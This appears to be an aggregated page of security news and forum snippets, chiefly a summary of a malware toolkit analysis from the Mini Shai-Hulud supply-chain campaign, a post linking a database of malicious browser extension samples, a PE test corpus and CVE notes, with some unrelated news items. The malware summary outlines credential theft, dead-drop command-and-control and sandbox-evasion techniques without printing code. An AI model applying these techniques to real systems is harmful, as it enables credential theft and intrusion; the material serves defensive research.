Researchers tore apart the second-stage Python toolkit used in the Mini Shai-Hulud supply chain campaign. The delivery via trojanized npm/PyPI packages got coverage elsewhere. This goes deeper into what actually runs on the machine after. 13 modules, parallel execution, 90+ credential targets. Here's what stood out: * FIRESCALE is a dead-drop resolver that queries GitHub's commit search API globally looking for a signed backup C2 address. The RSA public key is embedded in the malware. No attacker repo to take down, the redirect can come from any account * When both C2 paths fail, the malware creates a public repo under the victim's own GitHub account and commits the credential harvest there. Operator retrieves it via public API, no auth required * The AWS module covers all 19 regions including both GovCloud partitions, restricted to US government and defense contractors * Kubernetes certs loaded entirely in kernel memory via memfd\_create. Nothing hits disk * Geopolitical wiper targets Israeli/Iranian systems with a 1-in-6 probability gate, specifically designed to evade single-run sandbox analysis
Hello all, The past few months I really got into Malicious Browser Extensions. During the creation of my project I started an automation that collects malicious browser extensions. During my thesis as a student I struggled to find CRX files.. so I created my own database of them. Here is the github for it: [https://github.com/GherardoFiori/MaliciousBrowserExtensions](https://github.com/GherardoFiori/MaliciousBrowserExtensions) Here is more info about the automation behind it: [https://buio.me/n8n](https://buio.me/n8n) I hope this can help someone with their own research around this subject. Since I really struggled to get my hands on crx files when it came to "malware" or "malicious"
I just wrapped a 99‑fixture adversarial PE corpus for IOCX — deterministic, spec‑aware, malformed‑but‑parseable binaries, each isolating a single structural anomaly. The whole thing is only 250 KB and it already helped tighten up an unreleased validator. IOCX now walks even the most pathological PEs with confidence. Honestly, this is the most fun I’ve had with PE internals in years. Happy to share details if anyone’s curious. Github: [https://github.com/iocx-dev/iocx](https://github.com/iocx-dev/iocx)
France is already moving on from Zoom and Microsoft Teams in favor of homegrown alternatives. Other countries are quickly following suit.
A look at how Kubernetes CVE-2021-25740 allows users with EndpointSlice access to redirect traffic via shared ingress and load balancer services.
A new SonicWall scanning surge mirrors the pattern that preceded CVE-2026-0400. GreyNoise details the activity and what defenders should watch.
Wednesday, May 20
Attorney John Scola is representing a police officer who is suing over injuries allegedly sustained while working security at an MSG property in 2025.